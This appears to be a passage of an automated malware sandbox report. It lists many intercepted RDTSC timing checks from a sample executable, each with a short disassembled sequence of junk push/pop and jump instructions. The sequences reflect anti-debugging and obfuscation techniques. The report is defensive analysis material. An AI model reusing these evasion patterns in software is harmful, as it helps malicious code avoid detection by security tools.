Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 7753AF second address: 7753B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 7753B3 second address: 775450 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jnl 00007F9F08C2E4B8h 0x00000010 push edi 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop edi 0x00000014 popad 0x00000015 nop 0x00000016 push dword ptr fs:[00000000h] 0x0000001d mov ebx, dword ptr [ebp+122D3C62h] 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a movsx ebx, di 0x0000002d sub dword ptr [ebp+122D30EAh], ecx 0x00000033 mov eax, dword ptr [ebp+122D12F5h] 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007F9F08C2E4B8h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 00000018h 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 call 00007F9F08C2E4C3h 0x00000058 call 00007F9F08C2E4C0h 0x0000005d mov bx, 0036h 0x00000061 pop ebx 0x00000062 pop edi 0x00000063 sbb ebx, 56CD338Fh 0x00000069 push FFFFFFFFh 0x0000006b sub dword ptr [ebp+122D299Ch], edi 0x00000071 push eax 0x00000072 jc 00007F9F08C2E4C0h 0x00000078 push eax 0x00000079 push edx 0x0000007a push eax 0x0000007b pop eax 0x0000007c rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 777368 second address: 77736C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 77736C second address: 777372 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 777372 second address: 777376 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 778394 second address: 778399 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 77742F second address: 777434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 77A021 second address: 77A025 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 77A025 second address: 77A02B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 77A02B second address: 77A031 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 77A031 second address: 77A035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 77929D second address: 7792A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 77C012 second address: 77C09C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007F9F08C2F7D8h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 0000001Ch 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007F9F08C2F7D8h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 0000001Ch 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d pushad 0x0000003e mov dx, 8684h 0x00000042 mov bl, A6h 0x00000044 popad 0x00000045 push 00000000h 0x00000047 or ebx, dword ptr [ebp+1245FA5Dh] 0x0000004d xchg eax, esi 0x0000004e pushad 0x0000004f jnp 00007F9F08C2F7D8h 0x00000055 pushad 0x00000056 popad 0x00000057 jmp 00007F9F08C2F7DFh 0x0000005c popad 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 jp 00007F9F08C2F7DCh 0x00000066 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 77CFAA second address: 77CFB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 77CFB1 second address: 77D033 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F9F08C2F7DAh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov bh, 5Dh 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F9F08C2F7D8h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c sub dword ptr [ebp+122D1FEDh], esi 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007F9F08C2F7D8h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 00000014h 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e xchg eax, esi 0x0000004f jmp 00007F9F08C2F7DEh 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 jnp 00007F9F08C2F7E0h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 77C209 second address: 77C20D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 77C20D second address: 77C217 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9F08C2F7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 77C217 second address: 77C21D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 77C21D second address: 77C237 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jnc 00007F9F08C2F7DCh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 77C237 second address: 77C23B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 77F136 second address: 77F14F instructions: 0x00000000 rdtsc 0x00000002 js 00007F9F08C2F7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9F08C2F7DBh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 77F3CE second address: 77F3D3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 78122A second address: 781230 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 782242 second address: 78225D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jns 00007F9F08C2E4B6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9F08C2E4BBh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 7824D7 second address: 7824DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 78413E second address: 78414D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9F08C2E4BBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 7862AB second address: 7862AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 7862AF second address: 7862E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F9F08C2E4DAh 0x0000000c jmp 00007F9F08C2E4BCh 0x00000011 jmp 00007F9F08C2E4C8h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 7862E3 second address: 7862F8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9F08C2F7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d ja 00007F9F08C2F7D6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 78BF76 second address: 78BF7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 78BF7A second address: 78BF8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7E1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 78BF8F second address: 78BFAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F9F08C2E4C8h 0x0000000c jmp 00007F9F08C2E4C2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 78C136 second address: 78C13E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 78C13E second address: 78C144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 78C144 second address: 78C148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 78C148 second address: 78C14E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 78C14E second address: 78C15C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F9F08C2F7DCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 78C2DC second address: 78C2E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 78C2E0 second address: 78C2E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 78C2E6 second address: 78C2EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 78C2EF second address: 78C2F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 78C2F5 second address: 78C2FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 7922E4 second address: 7922EE instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9F08C2F7DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 7922EE second address: 7922FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F9F08C2E4BCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 7922FF second address: 792303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 792303 second address: 792309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 7923BB second address: 7923C1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 7923C1 second address: 7923D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9F08C2E4C4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 796F6F second address: 796F78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 796F78 second address: 796F7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 796F7C second address: 796F9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7E9h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 796F9B second address: 796FA0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 796244 second address: 796248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 796248 second address: 796267 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9F08C2E4B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F9F08C2E4C3h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 796267 second address: 796272 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jne 00007F9F08C2F7D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 79655D second address: 796563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 796563 second address: 796572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F9F08C2F7D6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 796572 second address: 79657C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9F08C2E4B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 7969D8 second address: 7969F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7E1h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 7969F5 second address: 7969F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 796CA1 second address: 796CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F08C2F7E3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 796CBA second address: 796CD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F08C2E4BAh 0x00000009 popad 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F9F08C2E4BEh 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 796CD6 second address: 796CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jns 00007F9F08C2F7D6h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76A5E1 second address: 76A5E7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76A5E7 second address: 751888 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov cl, E1h 0x0000000e call dword ptr [ebp+122D1DD9h] 0x00000014 push ebx 0x00000015 push ecx 0x00000016 jmp 00007F9F08C2F7E5h 0x0000001b pop ecx 0x0000001c jl 00007F9F08C2F7DEh 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76AB3B second address: 76AB41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76AC48 second address: 76ACC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [eax] 0x00000008 push ebx 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push edi 0x00000015 push eax 0x00000016 jmp 00007F9F08C2F7E1h 0x0000001b pop eax 0x0000001c pop edi 0x0000001d pop eax 0x0000001e or edi, 0C0CF061h 0x00000024 call 00007F9F08C2F7D9h 0x00000029 jnl 00007F9F08C2F7F7h 0x0000002f push eax 0x00000030 push esi 0x00000031 jno 00007F9F08C2F7D8h 0x00000037 pop esi 0x00000038 mov eax, dword ptr [esp+04h] 0x0000003c push eax 0x0000003d push edx 0x0000003e je 00007F9F08C2F7DCh 0x00000044 jc 00007F9F08C2F7D6h 0x0000004a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76ACC5 second address: 76ACE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9F08C2E4C2h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76ACE3 second address: 76ACE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76ACE9 second address: 76ACED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76AE23 second address: 76AE27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76AE27 second address: 76AE3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], esi 0x00000009 mov dword ptr [ebp+122D3C75h], edi 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 push edx 0x00000014 pop edx 0x00000015 pop ebx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76AE3D second address: 76AE42 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76AF8F second address: 76AFB4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9F08C2E4CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76B0DC second address: 76B0E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76B0E0 second address: 76B133 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F9F08C2E4B6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 mov dword ptr [ebp+12483C0Dh], ecx 0x00000017 push 00000004h 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007F9F08C2E4B8h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 0000001Ah 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 pushad 0x00000034 mov dword ptr [ebp+122D3AB8h], ebx 0x0000003a movzx ecx, si 0x0000003d popad 0x0000003e nop 0x0000003f pushad 0x00000040 jp 00007F9F08C2E4B8h 0x00000046 push edx 0x00000047 pop edx 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76B537 second address: 76B540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76B540 second address: 76B55D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 sbb edi, 5964CEB2h 0x0000000e push 0000001Eh 0x00000010 nop 0x00000011 push ecx 0x00000012 push ebx 0x00000013 pushad 0x00000014 popad 0x00000015 pop ebx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76B87C second address: 76B897 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9F08C2F7E7h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76B897 second address: 76B89B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76B97C second address: 76B982 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79A46F second address: 79A475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79A8B9 second address: 79A8C6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9F08C2F7D8h 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
